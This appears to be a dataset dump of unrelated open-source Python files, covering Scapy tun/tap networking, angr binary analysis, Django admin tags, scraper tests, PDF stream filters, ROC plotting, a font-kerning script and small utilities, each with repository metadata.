elif BSD: # also DARWIN
if not (self.iface.startswith(b"tap") or
self.iface.startswith(b"tun")):
raise ValueError("Interface names must start with `tun` or "
"`tap` on BSD and Darwin")
devname = b"/dev/" + self.iface
if not self.strip_packet_info:
warning("tun/tap devices on BSD and Darwin never include "
"packet info!")
self.strip_packet_info = True
else:
raise NotImplementedError("TunTapInterface is not supported on "
"this platform!")
sock = open(devname, "r+b", buffering=0)
if LINUX:
if self.mode_tun:
flags = LINUX_IFF_TUN
else:
# Linux can send us LinuxTunPacketInfo for TAP interfaces, but
# the kernel sends the wrong information!
#
# Instead of type=1 (Ether), it sends that of the payload
# (eg: 0x800 for IPv4 or 0x86dd for IPv6).
#
# tap interfaces always send Ether frames, which include a
# type parameter for the IPv4/v6/etc. payload, so we set
# IFF_NO_PI.
flags = LINUX_IFF_TAP | LINUX_IFF_NO_PI
tsetiff = raw(LinuxTunIfReq(
ifrn_name=bytes_encode(self.iface),
ifru_flags=flags))
ioctl(sock, LINUX_TUNSETIFF, tsetiff)
self.closed = False
self.default_read_size = default_read_size
super(TunTapInterface, self).__init__(sock)
def __call__(self, *arg, **karg):
"""Needed when using an instantiated TunTapInterface object for
conf.L2listen, conf.L2socket or conf.L3socket.
"""
return self
def recv_raw(self, x=None):
if x is None:
x = self.default_read_size
x += self.mtu_overhead
if six.PY2:
# For some mystical reason, using self.ins.read ignores
# buffering=0 on python 2.7 and blocks ?!
dat = os.read(self.ins.fileno(), x)
else:
dat = self.ins.read(x)
r = self.kernel_packet_class, dat, time.time()
if self.mtu_overhead > 0 and self.strip_packet_info:
# Get the packed class of the payload, without triggering a full
# decode of the payload data.
cls = r[0](r[1][:self.mtu_overhead]).guess_payload_class(b'')
# Return the payload data only
return cls, r[1][self.mtu_overhead:], r[2]
else:
return r
def send(self, x):
if hasattr(x, "sent_time"):
x.sent_time = time.time()
if self.kernel_packet_class == IPv46:
# IPv46 is an auto-detection wrapper; we should just push through
# packets normally if we got IP or IPv6.
if not isinstance(x, (IP, IPv6)):
x = IP() / x
elif not isinstance(x, self.kernel_packet_class):
x = self.kernel_packet_class() / x
sx = raw(x)
try:
self.outs.write(sx)
self.outs.flush()
except socket.error:
log_runtime.error("%s send",
self.__class__.__name__, exc_info=True)
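# Usage sketch for the class above (requires root and a kernel with tun/tap
# support; the interface name and destination address are assumptions):
#
#   from scapy.all import IP, ICMP
#   tun = TunTapInterface(iface="tun0", mode_tun=True)
#   # configure the interface and addresses outside Scapy, e.g. with `ip`
#   tun.send(IP(dst="192.0.2.1") / ICMP())   # hand a packet to the kernel
#   reply = tun.recv()                       # read whatever the peer sends back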
|
angr/analyses/class_identifier.py
|
matthewpruett/angr
| 6,132 |
67533
|
<filename>angr/analyses/class_identifier.py
from ..sim_type import SimCppClass, SimTypeCppFunction
from ..analyses import AnalysesHub
from . import Analysis
class ClassIdentifier(Analysis):
"""
    This is a class identifier for non-stripped or partially stripped binaries. It identifies classes based on the
    demangled function names and assigns functions to their respective classes based on those names. It also uses
    the results from the VtableFinder analysis to assign the corresponding vtable to each class.
self.classes contains a mapping between class names and SimCppClass objects
e.g. A::tool() and A::qux() belong to the class A
"""
def __init__(self):
if "CFGFast" not in self.project.kb.cfgs:
self.project.analyses.CFGFast(cross_references=True)
self.classes = {}
vtable_analysis = self.project.analyses.VtableFinder()
self.vtables_list = vtable_analysis.vtables_list
self._analyze()
def _analyze(self):
# Assigning function to classes
for func in self.project.kb.functions.values():
if func.is_plt:
continue
col_ind = func.demangled_name.rfind("::")
class_name = func.demangled_name[:col_ind]
if class_name.startswith("non-virtual thunk for "):
class_name = class_name[len("non-virtual thunk for ") :]
if col_ind != -1:
if class_name not in self.classes:
ctor = False
                    if "{ctor}" in func.demangled_name:
ctor = True
function_members = {
func.addr: SimTypeCppFunction(
[], None, label=func.demangled_name, ctor=ctor
)
}
new_class = SimCppClass(
name=class_name, function_members=function_members
)
self.classes[class_name] = new_class
else:
ctor = False
                    if "{ctor}" in func.demangled_name:
ctor = True
cur_class = self.classes[class_name]
cur_class.function_members[func.addr] = SimTypeCppFunction(
[], None, label=func.demangled_name, ctor=ctor
)
# Assigning a vtable to a class
for vtable in self.vtables_list:
for ref in self.project.kb.xrefs.xrefs_by_dst[vtable.vaddr]:
vtable_calling_func = self.project.kb.functions.floor_func(ref.ins_addr)
tmp_col_ind = vtable_calling_func.demangled_name.rfind("::")
possible_constructor_class_name = vtable_calling_func.demangled_name[
:tmp_col_ind
]
if (
"ctor" in vtable_calling_func.demangled_name
and possible_constructor_class_name in self.classes
):
self.classes[possible_constructor_class_name].vtable_ptrs.append(
vtable.vaddr
)
AnalysesHub.register_default("ClassIdentifier", ClassIdentifier)
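# Usage sketch (the binary path is hypothetical; the analysis expects a C++
# binary with symbols so that demangled names are available):
#
#   import angr
#   proj = angr.Project("./a.out", auto_load_libs=False)
#   ci = proj.analyses.ClassIdentifier()
#   for name, cpp_class in ci.classes.items():
#       print(name, len(cpp_class.function_members), cpp_class.vtable_ptrs)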
|
subadmin/templatetags/subadmin_tags.py
|
inueni/django-subadmin
| 133 |
67542
|
from django.urls import reverse
from django.contrib.admin.templatetags.admin_modify import submit_row
from django.utils.encoding import force_text
from django.template import Library
register = Library()
@register.inclusion_tag('subadmin/breadcrumbs.html', takes_context=True)
def subadmin_breadcrumbs(context):
request = context['request']
opts = context['opts']
root = {
'name': request.subadmin.root['object']._meta.app_config.verbose_name,
'url': reverse('admin:app_list', kwargs={'app_label': request.subadmin.root['object']._meta.app_label})
}
    breadcrumbs = []
view_args = list(request.subadmin.view_args)
i = 0
subadmin_parents = request.subadmin.parents[::-1]
for parent in subadmin_parents:
adm = parent['admin']
obj = parent['object']
breadcrumbs.extend([{
'name': obj._meta.verbose_name_plural,
'url': adm.reverse_url('changelist', *view_args[:i]),
'has_change_permission': adm.has_change_permission(request),
}, {
'name': force_text(obj),
'url': adm.reverse_url('change', *view_args[:i + 1]),
'has_change_permission': adm.has_change_permission(request, obj),
}])
i += 1
return {
'root': root,
'breadcrumbs': breadcrumbs,
'opts': opts,
}
@register.simple_tag(takes_context=True)
def subadmin_url(context, viewname, *args, **kwargs):
subadmin = context['request'].subadmin
view_args = subadmin.base_url_args[:-1] if subadmin.object_id else subadmin.base_url_args
return reverse('admin:%s_%s' % (subadmin.base_viewname, viewname), args=view_args + list(args), kwargs=kwargs)
@register.inclusion_tag('subadmin/submit_line.html', takes_context=True)
def subadmin_submit_row(context):
ctx = submit_row(context)
ctx.update({
'request': context['request']
})
return ctx
|
tests/test_chi_library.py
|
joshagoldstein/city-scrapers
| 255 |
67572
|
from datetime import datetime
from os.path import dirname, join
from unittest.mock import MagicMock
import pytest
from city_scrapers_core.constants import BOARD, TENTATIVE
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_library import ChiLibrarySpider
freezer = freeze_time("2018-12-20")
freezer.start()
session = MagicMock()
res_mock = MagicMock()
res_mock.status_code = 200
session.get.return_value = res_mock
test_response = file_response(
join(dirname(__file__), "files", "chi_library.html"),
url="https://www.chipublib.org/board-of-directors/board-meeting-schedule/",
)
spider = ChiLibrarySpider(session=session)
parsed_items = [item for item in spider.parse(test_response)]
freezer.stop()
def test_title():
assert parsed_items[0]["title"] == "Board of Directors"
def test_description():
assert parsed_items[0]["description"] == ""
def test_start():
assert parsed_items[0]["start"] == datetime(2021, 1, 26, 9)
def test_id():
assert parsed_items[0]["id"] == "chi_library/202101260900/x/board_of_directors"
def test_status():
assert parsed_items[0]["status"] == TENTATIVE
def test_all_day():
assert parsed_items[0]["all_day"] is False
def test_location():
assert parsed_items[0]["location"] == {
"address": "",
"name": "Virtual",
}
def test_links():
assert parsed_items[0]["links"] == [
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-agenda-january-26-2021/", # noqa
"title": "Agenda",
},
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-minutes-january-26-2021/", # noqa
"title": "Minutes",
},
]
@pytest.mark.parametrize("item", parsed_items)
def test_classification(item):
assert item["classification"] == BOARD
@pytest.mark.parametrize("item", parsed_items)
def test_end(item):
assert item["end"] is None
@pytest.mark.parametrize("item", parsed_items)
def test_source(item):
assert (
item["source"]
== "https://www.chipublib.org/board-of-directors/board-meeting-schedule/"
)
|
ffcv/memory_managers/process_cache/page_reader.py
|
neuroailab/ffcv
| 1,969 |
67574
|
from threading import Thread
from queue import Queue
import numpy as np
from ...libffcv import read
class PageReader(Thread):
def __init__(self, fname:str, queries: Queue, loaded: Queue,
memory: np.ndarray):
self.fname: str = fname
self.queries: Queue = queries
self.memory: np.ndarray = memory
self.page_size = memory.shape[1]
self.loaded: Queue = loaded
super().__init__(daemon=True)
def run(self):
import hashlib
with open(self.fname, 'rb') as handle:
fileno = handle.fileno()
while True:
query = self.queries.get()
# No more work
if query is None:
break
page_number, slot = query
offset = np.uint64(page_number * self.page_size)
length = read(fileno, self.memory[slot], offset)
# print("L", page_number, slot, hashlib.md5(self.memory[slot]).hexdigest(), self.memory[slot].ctypes.data, length)
self.loaded.put(page_number)
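# Usage sketch (values are illustrative; in FFCV the memory manager that owns
# this thread supplies the real file name, slot count and page size):
#
#   queries, loaded = Queue(), Queue()
#   memory = np.zeros((8, 1 << 21), dtype=np.uint8)   # 8 slots of 2 MiB pages
#   reader = PageReader('data.beton', queries, loaded, memory)
#   reader.start()
#   queries.put((0, 0))   # read page 0 of the file into slot 0
#   loaded.get()          # blocks until the page bytes are in memory[0]
#   queries.put(None)     # tell the worker thread to exit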
|
pyhanko/pdf_utils/filters.py
|
peteris-zealid/pyHanko
| 161 |
67575
|
<reponame>peteris-zealid/pyHanko
"""
Implementation of stream filters for PDF.
Taken from PyPDF2 with modifications. See :ref:`here <pypdf2-license>`
for the original license of the PyPDF2 project.
Note that not all decoders specified in the standard are supported.
In particular ``/Crypt`` and ``/LZWDecode`` are missing.
"""
import binascii
import re
import struct
import zlib
from io import BytesIO
from .misc import PdfReadError, PdfStreamError, Singleton
__all__ = [
'Decoder', 'ASCII85Decode', 'ASCIIHexDecode', 'FlateDecode',
'get_generic_decoder'
]
decompress = zlib.decompress
compress = zlib.compress
class Decoder:
"""
General filter/decoder interface.
"""
def decode(self, data: bytes, decode_params: dict) -> bytes:
"""
Decode a stream.
:param data:
Data to decode.
:param decode_params:
Decoder parameters, sourced from the ``/DecoderParams`` entry
associated with this filter.
:return:
Decoded data.
"""
raise NotImplementedError
def encode(self, data: bytes, decode_params: dict) -> bytes:
"""
Encode a stream.
:param data:
Data to encode.
:param decode_params:
Encoder parameters, sourced from the ``/DecoderParams`` entry
associated with this filter.
:return:
Encoded data.
"""
raise NotImplementedError
def _png_decode(data: memoryview, columns):
output = BytesIO()
# PNG prediction can vary from row to row
rowlength = columns + 1
assert len(data) % rowlength == 0
prev_result = bytes(rowlength - 1)
for row in range(len(data) // rowlength):
rowdata = data[(row * rowlength):((row + 1) * rowlength)]
filter_byte = rowdata[0]
result_row = bytearray(rowlength - 1)
if filter_byte == 0:
pass
elif filter_byte == 1:
pairs = zip(rowdata[2:], rowdata[1:])
result_row[0] = rowdata[1]
for i, (x, y) in enumerate(pairs):
result_row[i + 1] = (x + y) % 256
elif filter_byte == 2:
pairs = zip(rowdata[1:], prev_result)
for i, (x, y) in enumerate(pairs):
result_row[i] = (x + y) % 256
else:
# unsupported PNG filter
raise PdfReadError(
"Unsupported PNG filter %r" % filter_byte
)
prev_result = result_row
output.write(result_row)
return output.getvalue()
class FlateDecode(Decoder, metaclass=Singleton):
"""
Implementation of the ``/FlateDecode`` filter.
.. warning::
Currently not all predictor values are supported. This may cause
problems when extracting image data from PDF files.
"""
def decode(self, data: bytes, decode_params):
# there's lots of slicing ahead, so let's reduce copying overhead
data = memoryview(decompress(data))
predictor = 1
if decode_params:
try:
predictor = decode_params.get("/Predictor", 1)
except AttributeError:
pass # usually an array with a null object was read
# predictor 1 == no predictor
if predictor == 1:
return data
columns = decode_params["/Columns"]
# PNG prediction:
if 10 <= predictor <= 15:
return _png_decode(data, columns)
else:
# unsupported predictor
raise PdfReadError(
"Unsupported flatedecode predictor %r" % predictor
)
def encode(self, data, decode_params=None):
# TODO support the parameters in the spec
return compress(data)
# TODO check boundary conditions in PDF spec
WS_REGEX = re.compile(b'\\s+')
ASCII_HEX_EOD_MARKER = b'>'
class ASCIIHexDecode(Decoder, metaclass=Singleton):
"""
Wrapper around :func:`binascii.hexlify` that implements the
:class:`.Decoder` interface.
"""
def encode(self, data: bytes, decode_params=None) -> bytes:
return binascii.hexlify(data) + b'>'
def decode(self, data, decode_params=None):
if isinstance(data, str):
data = data.encode('ascii')
data, _ = data.split(ASCII_HEX_EOD_MARKER, 1)
data = WS_REGEX.sub(b'', data)
return binascii.unhexlify(data)
# TODO reimplement LZW decoder
ASCII_85_EOD_MARKER = b'~>'
POWS = tuple(85 ** p for p in (4, 3, 2, 1, 0))
class ASCII85Decode(Decoder, metaclass=Singleton):
"""
Implementation of the base 85 encoding scheme specified in ISO 32000-1.
"""
def encode(self, data: bytes, decode_params=None) -> bytes:
# BytesIO is quite clever, in that it doesn't copy things until modified
data = BytesIO(data)
out = BytesIO()
while True:
grp = data.read(4)
if not grp:
break
# This needs to happen before applying padding!
# See § 7.4.3 in ISO 32000-1
if grp == b'\0\0\0\0':
out.write(b'z')
continue
bytes_read = len(grp)
if bytes_read < 4:
grp += b'\0' * (4 - bytes_read)
pows = POWS[:bytes_read + 1]
else:
pows = POWS
# write 5 chars in base85
grp_int, = struct.unpack('>L', grp)
for p in pows:
digit, grp_int = divmod(grp_int, p)
# use chars from 0x21 to 0x75
out.write(bytes((digit + 0x21,)))
out.write(ASCII_85_EOD_MARKER)
return out.getvalue()
def decode(self, data, decode_params=None):
if isinstance(data, str):
data = data.encode('ascii')
data, _ = data.split(ASCII_85_EOD_MARKER, 1)
data = BytesIO(WS_REGEX.sub(b'', data))
out = BytesIO()
while True:
next_char = data.read(1)
if not next_char:
break
if next_char == b'z':
out.write(b'\0\0\0\0')
continue
rest = data.read(4)
if not rest: # pragma: nocover
raise PdfStreamError(
'Nonzero ASCII85 group must have at least two digits.'
)
grp = next_char + rest
grp_result = 0
p = 0 # make the linter happy
# convert back from base 85 to int
for digit, p in zip(grp, POWS):
digit -= 0x21
if 0 <= digit < 85:
grp_result += p * digit
else: # pragma: nocover
raise PdfStreamError(
                        'Bytes in ASCII85 data must lie between 0x21 and 0x75.'
)
# 85 and 256 are coprime, so the last digit will always be off by
# one if we had to throw away a multiple of 256 in the encoding
# step (due to padding).
if len(grp) < 5:
grp_result += p
# Finally, pack the integer into a 4-byte unsigned int
# (potentially need to cut off some excess digits)
decoded = struct.pack('>L', grp_result)
out.write(decoded[:len(grp) - 1])
return out.getvalue()
class CryptFilterDecoder(Decoder):
def __init__(self, handler):
from .crypt import SecurityHandler
self.handler: SecurityHandler = handler
def decode(self, data: bytes, decode_params: dict) -> bytes:
from .crypt import IDENTITY
cf_name = decode_params.get('/Name', IDENTITY)
cf = self.handler.get_stream_filter(name=cf_name)
# the spec explicitly tells us to use the global key here, go figure
# (clause § 7.4.10 in both 32k-1 and 32k-2)
return cf.decrypt(cf.shared_key, data, params=decode_params)
def encode(self, data: bytes, decode_params: dict) -> bytes:
from .crypt import IDENTITY
cf_name = decode_params.get('/Name', IDENTITY)
cf = self.handler.get_stream_filter(name=cf_name)
return cf.encrypt(cf.shared_key, data, params=decode_params)
DECODERS = {
'/FlateDecode': FlateDecode, '/Fl': FlateDecode,
'/ASCIIHexDecode': ASCIIHexDecode, '/AHx': ASCIIHexDecode,
'/ASCII85Decode': ASCII85Decode, '/A85': ASCII85Decode,
}
def get_generic_decoder(name: str) -> Decoder:
"""
Instantiate a specific stream filter decoder type by (PDF) name.
The following names are recognised:
* ``/FlateDecode`` or ``/Fl`` for the decoder implementing Flate
compression.
* ``/ASCIIHexDecode`` or ``/AHx`` for the decoder that converts bytes to
their hexadecimal representations.
* ``/ASCII85Decode`` or ``/A85`` for the decoder that converts byte strings
to a base-85 textual representation.
.. warning::
``/Crypt`` is a special case because it requires access to the
document's security handler.
.. warning::
LZW compression is currently unsupported, as are most compression
methods that are used specifically for image data.
:param name:
Name of the decoder to instantiate.
"""
try:
cls = DECODERS[name]
except KeyError:
raise PdfStreamError(f"Stream filter '{name}' is not supported.")
return cls()
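# A quick round-trip sketch using the registry above, as it might be called from
# client code (the input bytes are arbitrary):
#
#   from pyhanko.pdf_utils.filters import get_generic_decoder
#   dec = get_generic_decoder('/ASCII85Decode')
#   encoded = dec.encode(b'hello world')
#   assert dec.decode(encoded) == b'hello world'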
|
PytoTests/test_pyto.py
|
snazari/Pyto
| 701 |
67576
|
<gh_stars>100-1000
"""
Tests for Pyto before submitting to the App Store.
"""
import unittest
import runpy
import sys
import os
class TestPyto(unittest.TestCase):
def test_lib(self):
from Lib import (apps, location, mainthread, motion,
multipeer, music, notification_center, notifications,
pasteboard, photos, pyto_core, pyto_ui,
remote_notifications, sharing, sound, speech, userkeys,
xcallback)
def test_modules(self):
runpy.run_module("download_all")
def test_pip(self):
import pip
pip.main(["install", "sympy"])
import sympy
pip.main(["uninstall", "sympy"])
def test_command_runner(self):
expected_result = "usage: pip.py [-h] [--verbose] [-6]\n sub-command ...\npip.py: error: argument sub-command: invalid choice: '—-help' (choose from 'list', 'install', 'download', 'search', 'versions', 'uninstall', 'update')"
out_path = os.path.join(os.path.expanduser("~/tmp"), "out.txt")
out = open(out_path, "w+")
_out = sys.stdout
_err = sys.stderr
sys.stdout = out
sys.stderr = out
sys.argv = ["pyto", "pip", "—-help"]
runpy.run_module("command_runner")
sys.stdout = _out
sys.stderr = _err
out.close()
out = open(out_path, "r")
res = out.read()
out.close()
res = res.replace(" ", "")
res = res.replace("\n", "")
res = res.replace("\t", "")
expected_result = expected_result.replace(" ", "")
expected_result = expected_result.replace("\n", "")
expected_result = expected_result.replace("\t", "")
self.assertEqual(res, expected_result)
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
|
vergeml/plots/roc.py
|
vergeml/VergeML
| 324 |
67582
|
<reponame>vergeml/VergeML
from vergeml.command import command, CommandPlugin
from vergeml.option import option
from vergeml.plots import load_labels
import os.path
import csv
from vergeml.utils import VergeMLError
import numpy as np
@command('roc', descr="Plot a ROC curve.")
@option('@AI')
@option('class', type='Optional[str]', descr="The class to plot.")
class ROCPlot(CommandPlugin):
def __call__(self, args, env):
# Plotting a ROC curve needs the model to follow the convention
# - labels.txt in checkpoints
# - predictions.csv in stats
from sklearn.metrics import roc_curve, auc
import matplotlib.pyplot as plt
from itertools import cycle
from scipy import interp
from vergeml.plots import load_labels, load_predictions
try:
labels = load_labels(env)
except FileNotFoundError:
raise VergeMLError("Can't plot ROC chart - not supported by model.")
if args['class'] and args['class'] not in labels:
raise VergeMLError("Unknown class: " + args['class'])
nclasses = len(labels)
lw = 2
try:
y_test, y_score = load_predictions(env, nclasses)
except FileNotFoundError:
raise VergeMLError("Can't plot ROC chart - not supported by model.")
# From:
# https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(nclasses):
fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(y_test.ravel(), y_score.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
if args['class']:
ix = labels.index(args['class'])
plt.figure()
plt.plot(fpr[ix], tpr[ix], color='darkorange',
lw=lw, label='ROC curve of class {0} (area = {1:0.4f})'.format(args['class'], roc_auc[ix]))
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve for @' + args['@AI'])
plt.legend(loc="lower right")
plt.show()
else:
# Compute macro-average ROC curve and ROC area
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(nclasses)]))
            # Then interpolate all ROC curves at these points
mean_tpr = np.zeros_like(all_fpr)
for i in range(nclasses):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= nclasses
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.4f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.4f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue', 'maroon', 'indigo'])
for i, color in zip(range(nclasses), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.4f})'
''.format(labels[i], roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve for @' + args['@AI'])
plt.legend(loc="lower right")
plt.show()
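if __name__ == "__main__":
    # Standalone sketch of the micro-average ROC computation used above, on
    # synthetic 3-class data (shapes and names here are illustrative only; the
    # plugin itself gets y_test/y_score from load_predictions()).
    from sklearn.metrics import roc_curve, auc
    rng = np.random.RandomState(0)
    y_test = np.eye(3)[rng.randint(0, 3, size=100)]   # one-hot ground truth
    y_score = rng.rand(100, 3)                        # fake per-class scores
    fpr_micro, tpr_micro, _ = roc_curve(y_test.ravel(), y_score.ravel())
    print("micro-average AUC: %.4f" % auc(fpr_micro, tpr_micro))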
|
Kerning/KernCrash Current Glyph.py
|
jpt/Glyphs-Scripts
| 283 |
67612
|
<reponame>jpt/Glyphs-Scripts<filename>Kerning/KernCrash Current Glyph.py
#MenuTitle: KernCrash Current Glyph
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Opens a new tab containing kerning combos with the current glyph that collide in the current fontmaster.
"""
from AppKit import NSNotFound, NSAffineTransform
from kernanalysis import effectiveKerning
exceptions="""
.notdef
Ldot ldot ldot.sc
Jacute jacute jacute.sc
periodcentered.loclCAT periodcentered.loclCAT.case periodcentered.loclCAT.sc
currency
emptyset
infinity
integral
product
summation
radical
partialdiff
lozenge
paragraph
asciicircum
"""
# def effectiveKerning( leftGlyphName, rightGlyphName, thisFont, thisFontMasterID):
# leftLayer = thisFont.glyphs[leftGlyphName].layers[thisFontMasterID]
# rightLayer = thisFont.glyphs[rightGlyphName].layers[thisFontMasterID]
# if Glyphs.versionNumber < 3:
# effectiveKerning = leftLayer.rightKerningForLayer_( rightLayer )
# else:
# effectiveKerning = leftLayer.nextKerningForLayer_direction_(rightLayer, leftLayer.parent.direction)
# if effectiveKerning < NSNotFound:
# return effectiveKerning
# else:
# return 0.0
def pathCountOnLayer( thisLayer ):
thisLayer.removeOverlap()
return len( thisLayer.paths )
def pathCount( thisGlyph, thisFontMasterID ):
thisLayer = thisGlyph.layers[thisFontMasterID].copyDecomposedLayer()
return pathCountOnLayer(thisLayer)
def pathCountForGlyphName( glyphName, thisFont, thisFontMasterID ):
thisGlyph = thisFont.glyphs[glyphName]
return pathCount( thisGlyph, thisFontMasterID )
def pathCountInKernPair( firstGlyphName, secondGlyphName, thisFont, thisFontMasterID, minDistance ):
#ligatureName = "%s_%s" % ( nameUntilFirstPeriod(firstGlyphName), nameUntilFirstPeriod(secondGlyphName) )
#newGlyph = thisFont.newGlyphWithName_changeName_( "_deleteMe", False )
ligatureLayer = thisFont.glyphs[secondGlyphName].layers[thisFontMasterID].copyDecomposedLayer()
addedLayer = thisFont.glyphs[firstGlyphName].layers[thisFontMasterID].copyDecomposedLayer()
# position of right component:
kerning = effectiveKerning( firstGlyphName, secondGlyphName, thisFont, thisFontMasterID )
rightShift = NSAffineTransform.transform()
rightShift.translateXBy_yBy_( addedLayer.width + kerning - minDistance, 0.0 )
ligatureLayer.transform_checkForSelection_( rightShift, False )
for addedPath in addedLayer.paths:
if Glyphs.versionNumber < 3:
ligatureLayer.addPath_( addedPath.copy() )
else:
ligatureLayer.addShape_( addedPath.copy() )
return pathCountOnLayer( ligatureLayer )
try:
# query frontmost fontmaster:
thisFont = Glyphs.font
thisFontMaster = thisFont.selectedFontMaster
thisFontMasterID = thisFontMaster.id
if not thisFont.selectedLayers:
Message(title="No glyph selected", message="The script could not determine the current glyph. Please select a glyph and try again.", OKButton=None)
else:
thisGlyph = thisFont.selectedLayers[0].parent
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
print("KernCrash Current Glyph Report for %s, master %s:\n" % (thisFont.familyName, thisFontMaster.name))
# get list of glyph names:
currentGlyphName = thisGlyph.name
exceptionList = exceptions.split()
completeSet = [g.name for g in thisFont.glyphs
if g.export
and g.name not in exceptionList # excluded glyphs, list at beginning of this .py
and g.subCategory != "Nonspacing" # no combining accents
]
# get pathcounts for every glyph:
pathCountDict = {}
for thisGlyphName in completeSet:
pathCountDict[thisGlyphName] = pathCountForGlyphName( thisGlyphName, thisFont, thisFontMasterID )
# all possible kern pairs:
tabStringLeftGlyphs = []
tabStringRightGlyphs = []
for otherGlyphName in completeSet:
firstCount = pathCountDict[currentGlyphName]
secondCount = pathCountDict[otherGlyphName]
# current glyph on left side:
kernCount = pathCountInKernPair( currentGlyphName, otherGlyphName, thisFont, thisFontMasterID, 0.0 )
if firstCount + secondCount > kernCount:
tabStringLeftGlyphs.append(otherGlyphName)
# += "/%s/%s/space" % ( firstGlyphName, secondGlyphName )
            # current glyph on right side:
kernCount = pathCountInKernPair( otherGlyphName, currentGlyphName, thisFont, thisFontMasterID, 0.0 )
if firstCount + secondCount > kernCount:
tabStringRightGlyphs.append(otherGlyphName)
#tabStringLeft += "/%s/%s/space" % ( firstGlyphName, secondGlyphName )
# open new Edit tab:
if tabStringLeftGlyphs or tabStringRightGlyphs:
Glyphs.showNotification('KernCrash Current Glyph', 'Some kerning crashes have been found.')
# opens new Edit tab:
tabStrings = []
if tabStringLeftGlyphs:
inBetween = " /%s/" % currentGlyphName
tabStrings.append( "/%s/"%currentGlyphName + inBetween.join(tabStringLeftGlyphs) )
print("Colliding glyphs when %s is on the LEFT:\n%s\n" % ( currentGlyphName, " ".join(tabStringLeftGlyphs) ))
if tabStringRightGlyphs:
inBetween = "/%s /" % currentGlyphName
tabStrings.append( "/" + inBetween.join(tabStringRightGlyphs) + "/%s"%currentGlyphName )
print("Colliding glyphs when %s is on the RIGHT:\n%s\n" % ( currentGlyphName, " ".join(tabStringRightGlyphs) ))
thisFont.newTab( "\n\n".join(tabStrings) )
# Floating notification:
Glyphs.showNotification(
"KernCrashed %s, master ‘%s’" % (thisFont.familyName, thisFontMaster.name),
"Found %i kerning collisions with %s. Details in Macro Window" % ( len(tabStringRightGlyphs)+len(tabStringLeftGlyphs), currentGlyphName ),
)
# or report that nothing was found:
else:
# Floating notification:
Glyphs.showNotification(
"KernCrashed %s, master ‘%s’:" % (thisFont.familyName, thisFontMaster.name),
"No collisions found for %s." % currentGlyphName,
)
except Exception as e:
Message("KernCrash Error", "KernCrash Current Glyph Error: %s\nTraceback in Macro Window." % e, OKButton=None)
import traceback
print(traceback.format_exc())
print(pathCountDict)
|
flocker/common/process.py
|
stackriot/flocker
| 2,690 |
67653
|
<gh_stars>1000+
# Copyright ClusterHQ Inc. See LICENSE file for details.
"""
Subprocess utilities.
"""
from subprocess import PIPE, STDOUT, CalledProcessError, Popen
from eliot import Message, start_action
from pyrsistent import PClass, field
class _CalledProcessError(CalledProcessError):
"""
Just like ``CalledProcessError`` except output is included in the string
representation.
"""
def __str__(self):
base = super(_CalledProcessError, self).__str__()
lines = "\n".join(" |" + line for line in self.output.splitlines())
return base + " and output:\n" + lines
class _ProcessResult(PClass):
"""
The return type for ``run_process`` representing the outcome of the process
that was run.
"""
command = field(type=list, mandatory=True)
output = field(type=bytes, mandatory=True)
status = field(type=int, mandatory=True)
def run_process(command, *args, **kwargs):
"""
Run a child process, capturing its stdout and stderr.
:param list command: An argument list to use to launch the child process.
:raise CalledProcessError: If the child process has a non-zero exit status.
:return: A ``_ProcessResult`` instance describing the result of the child
process.
"""
kwargs["stdout"] = PIPE
kwargs["stderr"] = STDOUT
action = start_action(
action_type="run_process", command=command, args=args, kwargs=kwargs)
with action:
process = Popen(command, *args, **kwargs)
output = process.stdout.read()
status = process.wait()
result = _ProcessResult(command=command, output=output, status=status)
# TODO: We should be using a specific logging type for this.
Message.new(
command=result.command,
output=result.output,
status=result.status,
).write()
if result.status:
raise _CalledProcessError(
returncode=status, cmd=command, output=output,
)
return result
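if __name__ == "__main__":
    # Minimal usage sketch (assumes a POSIX `echo` on PATH; the Eliot action is
    # logged as usual and the result carries command, combined output and status).
    result = run_process(["echo", "hello"])
    print(result.status, result.output)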
|
brml/myzeros.py
|
herupraptono/pybrml
| 136 |
67672
|
#!/usr/bin/env python
"""
same as myzeros() in MATLAB
MYZEROS same as zeros(x) but if x is a scalar interprets as zeros([x 1])
"""
import numpy as np
def myzeros(x):
    print("x =", x)
x = np.array(x)
if x.size > 1:
out=np.zeros(x)
else:
out=np.zeros((x,1))
return out
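if __name__ == "__main__":
    # Quick check of both branches: a scalar yields a column vector, while a
    # shape sequence is passed through to np.zeros unchanged.
    print(myzeros(3).shape)        # (3, 1)
    print(myzeros([2, 4]).shape)   # (2, 4)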
|
ppci/lang/sexpr.py
|
windelbouwman/ppci
